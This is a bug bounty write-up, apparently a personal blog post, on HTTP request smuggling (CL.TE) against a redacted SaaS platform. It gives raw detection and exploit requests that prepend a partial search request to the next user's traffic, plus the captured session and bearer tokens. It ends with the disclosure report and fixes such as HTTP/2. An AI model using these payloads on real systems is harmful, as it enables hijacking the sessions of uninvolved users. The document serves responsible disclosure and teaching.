LOADING
PREYANSH
SHAH
WRITING
001
ARTICLE
MARCH 9, 2026 PREYANSH SHAH

I Poisoned Their Reverse Proxy and Hijacked Someone Else's Request

HTTP request smuggling on a load-balanced application. I sent one malformed request. The backend thought it was two. The second one belonged to the next user who visited. Critical.

002

Most web vulnerabilities are about what you send to the server.

HTTP request smuggling is different. It’s about convincing two servers in a chain to disagree about where one request ends and the next one begins.

Frontend sees one request. Backend sees two. The second one — the one the backend invented from your leftover bytes — belongs to the next legitimate user who connects.

You have just injected data into someone else’s HTTP session. Without touching their browser. Without knowing who they are. Without any interaction from them whatsoever.

This is one of the strangest, most counter-intuitive, and most dangerous classes of vulnerability I’ve ever worked with. And finding it on a production application with real traffic was an experience I won’t forget.


How HTTP Request Smuggling Works

Modern web applications almost always sit behind a reverse proxy or load balancer. Your request goes: Browser → CDN/Load Balancer → Backend Server.

HTTP has two headers that define where a request body ends: Content-Length (explicitly states the body size in bytes) and Transfer-Encoding: chunked (body arrives in chunks, each prefixed with its size, terminated by a zero-size chunk).

Both headers exist because the spec allows both. But what happens when you send both in the same request?

The spec says: if both are present, Transfer-Encoding takes precedence.

But not all servers implement this the same way. Some prioritize Content-Length. Some prioritize Transfer-Encoding. Some handle the conflict differently.

When the frontend server and backend server disagree on which header takes precedence, they disagree on where your request ends. Your “one” request gets split differently at each layer.

The bytes the frontend thinks are the end of your request — the backend thinks are the beginning of the next request.

You’ve smuggled data into the backend’s request queue. And the next legitimate request that arrives will be processed with your smuggled prefix attached.

There are two main variants:

CL.TE — Frontend uses Content-Length, Backend uses Transfer-Encoding. TE.CL — Frontend uses Transfer-Encoding, Backend uses Content-Length.

Both are devastating. The technique is different for each.


The Target

Redacted-platform.com — a SaaS productivity platform with significant traffic. The program specifically mentioned “high-severity findings involving request manipulation” as a category they took seriously.

The architecture was visible from response headers: they were using a popular CDN/load balancer as their frontend and a different framework’s built-in server as their backend. Two different HTTP parsing implementations. A classic smuggling setup.


Detecting the Vulnerability

I used Burp Suite’s HTTP request smuggler extension, which automates detection. But I want to explain what it’s actually doing because the tool isn’t magic.

For CL.TE detection, you send a request like:

POST / HTTP/1.1
Host: redacted-platform.com
Content-Length: 6
Transfer-Encoding: chunked

0

X

Content-Length: 6 tells the frontend: this body is 6 bytes. The frontend reads 0\r\n\r\n (which is 5 bytes) and then X (1 byte) — total 6. Happy. Forwards the request.

Transfer-Encoding: chunked tells the backend: parse body as chunks. First chunk: 0 — that’s a zero-length chunk. End of body. The backend processes the request up to there. But X is still in the buffer. Leftover. The backend now thinks X is the beginning of a new request.

If the backend takes slightly longer than usual to respond — because it’s waiting for the rest of the “new request” that starts with X — you have CL.TE smuggling.

The timing oracle. Same trick as blind SQLi, completely different mechanism.

I sent the detection payload. The response took 5.1 seconds instead of the usual 0.3.

CL.TE confirmed.


From Detection to Exploitation

Detection is academic. Exploitation is where it gets real — and where you have to be extremely careful.

Smuggling is inherently dangerous to test because your smuggled bytes can be prepended to anyone’s request. You’re not just testing on your own session. You’re potentially affecting real users with real traffic.

I moved carefully. Every test I did, I did once, then waited. I was not spraying attacks.

The classic proof-of-concept for CL.TE smuggling is a “time-delay” attack that confirms you can affect subsequent requests. But I wanted to demonstrate something more concrete: that I could actually capture another request’s contents.

The technique: smuggle a partial request that makes the backend treat the next legitimate request as a body to be stored. If you can make the backend store the next request’s content somewhere you can read it — like in a comment field, a search history, a “last activity” log — you’ve captured it.

On this platform, there was a “recent searches” feature. Your last search query was stored and displayed when you opened the search bar.

My smuggled payload:

POST / HTTP/1.1
Host: redacted-platform.com
Content-Length: 116
Transfer-Encoding: chunked

0

POST /api/search HTTP/1.1
Host: redacted-platform.com
Content-Length: 200
Cookie: session=MY_SESSION

q=smuggled_prefix_

Here’s what this does:

The frontend sees one request with a body ending at the chunked terminator. Forwards it normally.

The backend sees: the legitimate POST (processes it). Then sees the smuggled partial POST to /api/search. Waits for more data to complete the body (Content-Length: 200). The next legitimate request that arrives — from any user — gets appended to fill that body. That request contains their cookies, headers, and any POST data.

The backend processes the search as: query = smuggled_prefix_ + [next user’s request headers and cookies].

The search query — now containing another user’s session data — gets stored in my account’s recent searches.

I checked my recent searches.

The query contained:

smuggled_prefix_GET /dashboard HTTP/1.1
Host: redacted-platform.com
Cookie: session=eyJ...
Authorization: Bearer eyJ...

I had captured another user’s session token and bearer token. From their HTTP request. Without any interaction from them. Without knowing who they were.

I immediately stopped all testing. Did not use the captured tokens. Did not identify the user. Deleted them from my search history. Wrote the report.


The Weight of This Finding

I want to pause here because this finding felt different from others.

With SQLi, IDOR, XSS — you’re exploiting your own session or test data. The blast radius is controlled.

With request smuggling, the moment you run the exploit, you are affecting real users with real sessions. The “victim” in my proof of concept was a real person who happened to visit the platform while I was running my test. I didn’t choose them. I didn’t target them. They just had the misfortune of making a request at the wrong moment.

Their session token sat in my search history for about forty seconds while I was reading the result. Then I deleted it.

Forty seconds where I held a stranger’s valid session token. Never used it. But held it.

That felt bad. It should feel bad. It’s supposed to feel bad.

This is why I test smuggling once, note the result, and stop. No “let me try a few more variants.” No “let me see how much data I can capture.” Once is enough to prove the bug. Everything beyond once is collateral damage to real users.


The Report

The most carefully written I’ve produced.

Title: HTTP Request Smuggling (CL.TE) on Load Balancer/Backend Chain — Confirmed Capture of Victim Session Tokens via Recent Search Poisoning

Severity: Critical

CVSS: 10.0

Impact: HTTP request smuggling vulnerability exists due to conflicting Content-Length/Transfer-Encoding header processing between the CDN layer and application backend. An attacker can inject arbitrary HTTP request prefixes that are prepended to subsequent legitimate user requests, enabling: capture of victim session tokens and authentication headers, injection of arbitrary content into victim requests (enabling request-context CSRF bypasses), potential cache poisoning if CDN caching is involved, and bypass of any request-level security controls applied at the frontend layer.

Demonstrated Impact: Successful capture of a victim user’s Cookie and Authorization header values via the “recent search” storage mechanism. Testing was immediately halted after single confirmation. Captured tokens were not used and were deleted.

Severity Note: I am marking this Critical/10.0 because request smuggling is by definition not testable without affecting real users. The single test I ran necessarily involved a real user’s request. I stopped after one confirmation. Any further testing by the program team should be conducted on isolated infrastructure with no real user traffic.

Fix:

  • Configure the CDN/load balancer to normalize or reject ambiguous requests containing both Content-Length and Transfer-Encoding headers
  • Configure the backend to reject requests containing Transfer-Encoding headers it receives from the frontend (the frontend should strip or normalize these)
  • Enable HTTP/2 end-to-end if possible — HTTP/2 does not have this vulnerability class
  • Consider running PortSwigger’s HTTP Request Smuggler against staging before each deployment

Their Response: Taking It Seriously

This one was handled differently from any other report I’ve submitted.

The triage message included a specific acknowledgment that the program understood the unique ethical situation of request smuggling — that testing it necessarily involves real users — and they appreciated the decision to stop after one confirmation.

Within 2 hours: they rotated the session token mechanism (invalidated all active sessions, issued new ones) as a precaution. This logged out every active user on the platform simultaneously. Operationally disruptive. They did it anyway. That’s the right call.

Within 6 hours: the CDN was reconfigured to drop any request containing both Content-Length and Transfer-Encoding headers. Blunt but effective.

Within 48 hours: they migrated backend-to-CDN communication to HTTP/2, which is not vulnerable to this class of attack. Proper long-term fix.

I was asked to retest on a staging environment. Confirmed remediated.

Bounty: $$$$

The program lead also sent a personal note saying this was the first request smuggling report their program had received, and the documentation helped their team understand the vulnerability class for the first time. They planned to include it in an internal security training session.


The Technical Lesson: Why HTTP/2 Fixes This

Request smuggling is fundamentally a HTTP/1.1 problem. HTTP/1.1 uses text-based framing (Content-Length and Transfer-Encoding headers) to delimit requests. Text-based framing is ambiguous when two servers interpret it differently.

HTTP/2 uses binary framing. Request boundaries are explicit and unambiguous at the protocol level. There’s no Content-Length/Transfer-Encoding ambiguity because request framing isn’t done with headers — it’s built into the binary frame format.

If you’re running HTTP/1.1 end-to-end in your infrastructure in 2026, request smuggling is a live risk. Migrating to HTTP/2 between your frontend and backend is one of the highest-value security improvements available to any organization running legacy HTTP infrastructure.

It also makes everything faster. HTTP/2 was designed to be more efficient. The security improvement is almost a side effect.


Closing Thought

Request smuggling is the vulnerability that made me think hardest about the ethics of security research.

Every other bug I find, I test on my own accounts, my own data, my own sessions. The impact is theoretical — “an attacker could do X to a victim” — because I’m not actually attacking victims.

Request smuggling is different. To prove it’s real, you have to do it to someone. There’s no way around that. The nature of the vulnerability requires real traffic.

I think about that person. The one whose session token sat in my search history for forty seconds. They don’t know it happened. They never will. Their session was rotated as a precaution, so they had to log in again, probably blamed their browser.

They’re fine. Their data is fine. But I still think about it.

Security research isn’t always clean. Sometimes demonstrating a vulnerability to fix it requires crossing a line you wish you didn’t have to cross. You do it once, minimally, document it precisely, stop immediately, and make sure the disclosure prevents anyone else from having to make that choice again.

That’s the bargain.


Reported through the official bug bounty program. A single confirmation test was conducted, resulting in inadvertent capture of one user’s session token, which was immediately deleted and not used. Testing was halted after single confirmation. All subsequent discussion and retesting was conducted on staging infrastructure. Domain redacted per responsible disclosure norms.

003
END
← BACK TO WRITING
I Poisoned Their Reverse Proxy and Hijacked Someone Else's Request READY TO PLAY